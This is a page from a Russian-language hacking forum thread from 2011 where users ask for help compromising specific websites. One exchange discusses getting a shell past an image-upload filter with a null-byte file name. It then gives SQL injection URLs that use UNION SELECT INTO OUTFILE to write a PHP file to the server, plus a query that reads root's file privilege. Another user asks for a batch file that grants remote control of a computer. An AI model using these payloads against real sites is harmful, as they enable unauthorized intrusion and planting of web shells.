HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1861 из 2438 « Первая < 8611361176118111851 1857 1858 1859 1860 1861 1862 1863 1864 1865 1871191119612361 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #18601  
Старый 20.11.2011, 15:34
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
Инклуда нет, и вариант shell.jpg%00.php - не проходит
js выводит ошибку:
Only JPEG files allowed
1) Попробуй подменить POST-запрос, через Tamper Data

2) SQL-injection есть??
 
Ответить с цитированием

  #18602  
Старый 20.11.2011, 15:36
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от aydin-ka  
aydin-ka said:
1) Попробуй подменить POST-запрос, через Tamper Data
2) SQL-injection есть??
sql-inj есть, щас попробую
 
Ответить с цитированием

  #18603  
Старый 20.11.2011, 15:42
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
sql-inj есть, щас попробую
1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны путь/1.php'--

P.S: у пользователя должны быть права на запись

2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--

Если появиться Y то действуй дальше
 
Ответить с цитированием

  #18604  
Старый 20.11.2011, 15:44
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от aydin-ka  
aydin-ka said:
1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны путь/1.php'--
P.S: у пользователя должны быть права на запись
2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--
Если появиться
Y
то действуй дальше
Доступа к mysql нет.
 
Ответить с цитированием

  #18605  
Старый 20.11.2011, 16:09
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию
подскажите код батника, чтобы он открывал удаленное управление компьютером
 
Ответить с цитированием

  #18606  
Старый 20.11.2011, 21:47
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Цитата:
Сообщение от Cherep  
Cherep said:
подскажите код батника, чтобы он открывал удаленное управление компьютером
Есть только батник кряк интернета, надо?
 
Ответить с цитированием

  #18607  
Старый 20.11.2011, 22:28
AppS
Познающий
Регистрация: 08.08.2009
Сообщений: 37
Провел на форуме:
162650

Репутация: 2
Отправить сообщение для AppS с помощью ICQ
По умолчанию
Может ТС имел что то типо этого ?

hххp:/thread276456-telnet.html
 
Ответить с цитированием

  #18608  
Старый 21.11.2011, 01:38
o'clock
Новичок
Регистрация: 16.05.2009
Сообщений: 12
Провел на форуме:
135091

Репутация: 2
По умолчанию
Цитата:
Сообщение от AppS  
AppS said:
Может ТС имел что то типо этого ?
hххp:/thread276456-telnet.html
ТС имел ввиду вот это

Цитата:
Сообщение от darky  
darky said:
В этой и только в этой теме вы можете задать вопрос проспособ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках(для остального есть поиск по форуму).

Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях
крайне не рекомендуется
 
Ответить с цитированием

  #18609  
Старый 21.11.2011, 04:45
AppS
Познающий
Регистрация: 08.08.2009
Сообщений: 37
Провел на форуме:
162650

Репутация: 2
Отправить сообщение для AppS с помощью ICQ
По умолчанию
Это надо у него спросить

В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html

есть такой абзац

Цитата:
Сообщение от None  
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все но что то сегодня мы с ним не дружим)

Заранее спасибо!
 
Ответить с цитированием

  #18610  
Старый 21.11.2011, 04:57
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию
Цитата:
Сообщение от AppS  
AppS said:
Это надо у него спросить
В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html
есть такой абзац
Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все
но что то сегодня мы с ним не дружим)
Заранее спасибо!
https://rdot.org/forum/showthread.php?t=352
 
Ответить с цитированием
Ответ
Страница 1861 из 2438 « Первая < 8611361176118111851 1857 1858 1859 1860 1861 1862 1863 1864 1865 1871191119612361 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ